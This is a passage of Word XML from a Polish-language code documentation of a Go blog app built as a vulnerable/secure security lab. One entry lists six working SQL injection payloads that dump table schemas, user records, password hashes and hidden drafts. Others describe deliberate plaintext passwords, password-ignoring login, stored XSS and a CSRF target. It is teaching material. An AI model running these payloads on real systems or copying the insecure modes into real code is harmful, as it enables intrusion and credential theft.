          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 96. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="209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[]Post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40" w:name="sec140"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>8.21. *Service.GetAllPosts</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14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internal/service/service.go:119</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> funkcja/metoda odczytująca dane z bazy albo warstwy serwisowej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GetAllPosts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Post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97" w:name="lst97"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 97. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="209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[]Post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41" w:name="sec141"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>8.22. *Service.GetPostByID</w:t>
      </w:r>
      <w:bookmarkEnd w:id="141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internal/service/service.go:148</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> funkcja/metoda odczytująca dane z bazy albo warstwy serwisowej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GetPostByID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Post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98" w:name="lst98"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 98. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="209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Post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42" w:name="sec142"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>8.23. *Service.SearchPosts</w:t>
      </w:r>
      <w:bookmarkEnd w:id="142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internal/service/service.go:164</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SearchPosts searches blog posts by query. Honors the SECURITY_ENABLED toggle: secure mode uses parameterized LIKE; insecure mode concatenates user input into the SQL string (classic SQL Injection).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SearchPosts searches blog posts by query. Honors the SECURITY_ENABLED toggle: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secure mode uses parameterized LIKE; insecure mode concatenates user input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into the SQL string (classic SQL Injection).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SearchPosts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Post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099" w:name="lst99"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 99. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="209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query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[]Post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43" w:name="sec143"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>8.24. *Service.SearchPostsVulnerable</w:t>
      </w:r>
      <w:bookmarkEnd w:id="143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internal/service/service.go:189</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SearchPostsVulnerable concatenates the user-supplied query directly into the SQL string. This is the demo SQL Injection sink used regardless of the SECURITY_ENABLED toggle (so the lab can always show a "force vulnerable" endpoint side-by-side).  Example payloads:   - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>zz' ORDER BY 8 --</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">     -&gt; leaks the SELECT column count through a database error in vulnerable mode   - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>zz' OR EXISTS(SELECT 1 FROM users WHERE username='admin' AND substr(password_hash,1,1)='a') --</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">     -&gt; proves boolean inference against the users table without a visible login form error   - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>zz' UNION SELECT 1, name, sql, 1, char(32), char(32), char(32) FROM sqlite_master WHERE type='table' --</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">     -&gt; enumerates SQLite table names and CREATE statements   - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>zz' UNION SELECT id, '[user] ' || username, 'role=' || role || ' email=' || email || ' secret=' || password_hash, 1, username, char(32), char(32) FROM users --</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">     -&gt; leaks user records through the title/content columns   - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>zz' UNION SELECT 9000, '[intel] database map', 'users=' || (SELECT COUNT(*) FROM users) || ' tables=' || (SELECT group_concat(name, ', ') FROM sqlite_master WHERE type='table'), 1, 'sqli-bot', char(32), char(32) --</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">     -&gt; creates an attacker-controlled intelligence summary row   - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>zz' UNION SELECT id, '[draft] ' || title, post_content, published, author_username, char(32), char(32) FROM blog WHERE published=0 --</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">     -&gt; leaks hidden drafts that secure search intentionally filters out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SearchPostsVulnerable concatenates the user-supplied query directly into the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SQL string. This is the demo SQL Injection sink used regardless of the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SECURITY_ENABLED toggle (so the lab can always show a "force vulnerable"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endpoint side-by-side).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Example payloads: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- `zz' ORDER BY 8 --`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  -&gt; leaks the SELECT column count through a database error in vulnerable mode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- `zz' OR EXISTS(SELECT 1 FROM users WHERE username='admin' AND substr(password_hash,1,1)='a') --`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  -&gt; proves boolean inference against the users table without a visible login form error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- `zz' UNION SELECT 1, name, sql, 1, char(32), char(32), char(32) FROM sqlite_master WHERE type='table' --`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  -&gt; enumerates SQLite table names and CREATE statements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- `zz' UNION SELECT id, '[user] ' || username, 'role=' || role || ' email=' || email || ' secret=' || password_hash, 1, username, char(32), char(32) FROM users --`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  -&gt; leaks user records through the title/content columns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- `zz' UNION SELECT 9000, '[intel] database map', 'users=' || (SELECT COUNT(*) FROM users) || ' tables=' || (SELECT group_concat(name, ', ') FROM sqlite_master WHERE type='table'), 1, 'sqli-bot', char(32), char(32) --`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  -&gt; creates an attacker-controlled intelligence summary row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- `zz' UNION SELECT id, '[draft] ' || title, post_content, published, author_username, char(32), char(32) FROM blog WHERE published=0 --`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    -&gt; leaks hidden drafts that secure search intentionally filters out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SearchPostsVulnerable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Post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00" w:name="lst100"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 100. Payload SQL Injection użyty w wyszukiwarce biblioteki. Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="210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query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[]Post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44" w:name="sec144"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>8.25. *Service.SearchPostsSecure</w:t>
      </w:r>
      <w:bookmarkEnd w:id="144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internal/service/service.go:205</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SearchPostsSecure runs the same query through a parameterized LIKE so user input cannot break out of the string literal — special characters become part of the search term, not SQL syntax.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SearchPostsSecure runs the same query through a parameterized LIKE so user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input cannot break out of the string literal — special characters become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part of the search term, not SQL syntax.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SearchPostsSecure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query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Post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01" w:name="lst101"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 101. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="210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query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[]Post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45" w:name="sec145"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>8.26. scanPostRows</w:t>
      </w:r>
      <w:bookmarkEnd w:id="145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internal/service/service.go:223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scanPostRows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rows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Rows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Post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02" w:name="lst102"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 102. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="210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rows</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>*sql.Rows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[]Post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46" w:name="sec146"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>8.27. *Service.CreatePost</w:t>
      </w:r>
      <w:bookmarkEnd w:id="146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internal/service/service.go:241</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CreatePost inserts a new post. Use empty strings for attachmentPath/Name when no file is attached.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CreatePost inserts a new post. Use empty strings for attachmentPath/Name when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no file is attached.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CreatePost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title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content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published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attachmentPath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attachmentName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int64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03" w:name="lst103"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 103. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="210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title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content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published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author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attachmentPath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attachmentName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int64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47" w:name="sec147"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>8.28. *Service.UpdatePost</w:t>
      </w:r>
      <w:bookmarkEnd w:id="147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internal/service/service.go:255</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> UpdatePost updates a post. Pass empty strings for attachment params to leave the existing attachment unchanged; pass non-empty values to replace it.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UpdatePost updates a post. Pass empty strings for attachment params to leave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the existing attachment unchanged; pass non-empty values to replace it.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UpdatePost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title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content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published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attachmentPath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attachmentName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br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2104" w:name="lst104"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 104. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="210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title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content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published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attachmentPath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attachmentName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48" w:name="sec148"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>8.29. *Service.DeletePost</w:t>
      </w:r>
      <w:bookmarkEnd w:id="148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internal/service/service.go:273</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> funkcja/metoda usuwająca rekord lub zasób aplikacji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DeletePost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br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2105" w:name="lst105"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 105. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="210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49" w:name="sec149"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>8.30. *Service.GetPostAuthor</w:t>
      </w:r>
      <w:bookmarkEnd w:id="149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internal/service/service.go:278</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> funkcja/metoda odczytująca dane z bazy albo warstwy serwisowej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GetPostAuthor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06" w:name="lst106"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 106. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="210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50" w:name="sec150"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>8.31. *Service.CreateUser</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15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internal/service/service.go:293</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CreateUser registers a new user. In secure mode the password is hashed with bcrypt before storage. In insecure mode the password is stored in plaintext (Sensitive Data Exposure).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CreateUser registers a new user.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In secure mode the password is hashed with bcrypt before storage.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In insecure mode the password is stored in plaintext (Sensitive Data Exposure).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CreateUser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email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br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2107" w:name="lst107"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 107. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="210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password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email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51" w:name="sec151"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>8.32. *Service.preparePassword</w:t>
      </w:r>
      <w:bookmarkEnd w:id="151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internal/service/service.go:305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preparePassword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plain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08" w:name="lst108"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 108. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="210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plain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częścią mechanizmu bezpieczeństwa albo scenariusza porównania vulnerable/secure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="152" w:name="sec152"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>8.33. *Service.UserExists</w:t>
      </w:r>
      <w:bookmarkEnd w:id="152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internal/service/service.go:317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UserExists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09" w:name="lst109"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 109. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="210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53" w:name="sec153"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>8.34. *Service.ValidateUserCredentials</w:t>
      </w:r>
      <w:bookmarkEnd w:id="153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internal/service/service.go:335</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ValidateUserCredentials checks whether username + password authenticate. Secure mode: bcrypt comparison. Insecure mode: only verifies the user exists (Broken Authentication — password is ignored to keep the legacy lab behavior).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ValidateUserCredentials checks whether username + password authenticate.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Secure mode: bcrypt comparison.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Insecure mode: only verifies the user exists (Broken Authentication —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password is ignored to keep the legacy lab behavior).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ValidateUserCredentials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password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10" w:name="lst110"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 110. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="211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password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54" w:name="sec154"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>8.35. *Service.GetDB</w:t>
      </w:r>
      <w:bookmarkEnd w:id="154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internal/service/service.go:360</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> GetDB returns the database connection for use in vulnerable endpoints (demo only)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GetDB returns the database connection for use in vulnerable endpoints (demo only)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GetDB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br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2111" w:name="lst111"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 111. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="211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*sql.DB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55" w:name="sec155"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>8.36. *Service.IsUserAdmin</w:t>
      </w:r>
      <w:bookmarkEnd w:id="155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internal/service/service.go:364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IsUserAdmin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12" w:name="lst112"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 112. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="211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56" w:name="sec156"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>8.37. *Service.CreateComment</w:t>
      </w:r>
      <w:bookmarkEnd w:id="156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internal/service/service.go:388</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CreateComment inserts a comment. In insecure mode the body is stored verbatim (Stored XSS risk). In secure mode the body is HTML-escaped before storage so script tags cannot execute when the comment is rendered.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CreateComment inserts a comment.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In insecure mode the body is stored verbatim (Stored XSS risk).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In secure mode the body is HTML-escaped before storage so script tags cannot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execute when the comment is rendered.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CreateComment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postID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int64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13" w:name="lst113"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 113. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="211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postID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author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body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int64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57" w:name="sec157"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>8.38. stripUnsafeHTML</w:t>
      </w:r>
      <w:bookmarkEnd w:id="157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internal/service/service.go:403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stripUnsafeHTML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114" w:name="lst114"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 114. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="211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body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58" w:name="sec158"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>8.39. *Service.CreateCommentVulnerable</w:t>
      </w:r>
      <w:bookmarkEnd w:id="158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internal/service/service.go:413</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CreateCommentVulnerable always stores the body verbatim, regardless of the SECURITY_ENABLED toggle. This keeps the force-vulnerable endpoint useful for side-by-side demo comparisons.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CreateCommentVulnerable always stores the body verbatim, regardless of the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SECURITY_ENABLED toggle. This keeps the force-vulnerable endpoint useful for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side-by-side demo comparisons.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CreateCommentVulnerable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postID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author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int64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15" w:name="lst115"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 115. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="211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postID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author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body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int64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59" w:name="sec159"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>8.40. *Service.GetCommentsByPostID</w:t>
      </w:r>
      <w:bookmarkEnd w:id="159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internal/service/service.go:426</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> GetCommentsByPostID returns all comments for a given post, ordered oldest first.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GetCommentsByPostID returns all comments for a given post, ordered oldest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first.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GetCommentsByPostID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postID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Comment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16" w:name="lst116"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 116. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="211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postID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[]Comment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60" w:name="sec160"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>8.41. *Service.GetAllUsers</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16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internal/service/service.go:454</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> GetAllUsers returns all rows from the users table. Used by the /ui/db-expose route to demonstrate Sensitive Data Exposure: in insecure mode password_hash contains the plaintext password.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GetAllUsers returns all rows from the users table.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Used by the /ui/db-expose route to demonstrate Sensitive Data Exposure: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in insecure mode password_hash contains the plaintext password.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GetAllUsers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color w:val="111827"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>UserRecord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17" w:name="lst117"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 117. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="211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[]UserRecord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61" w:name="sec161"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>8.42. *Service.UpdateUserEmail</w:t>
      </w:r>
      <w:bookmarkEnd w:id="161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internal/service/service.go:476</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> UpdateUserEmail changes the email for the given username. Used by the CSRF demo to perform a meaningful state change.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UpdateUserEmail changes the email for the given username.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Used by the CSRF demo to perform a meaningful state change.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UpdateUserEmail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newEmail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br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2118" w:name="lst118"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 118. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="211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newEmail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62" w:name="sec162"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>8.43. *Service.GetUserEmail</w:t>
      </w:r>
      <w:bookmarkEnd w:id="162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internal/service/service.go:485</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> GetUserEmail returns the current email for a username.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GetUserEmail returns the current email for a username.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GetUserEmail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error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19" w:name="lst119"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 119. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="211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error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63" w:name="sec163"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>8.44. *Service.CheckRateLimit</w:t>
      </w:r>
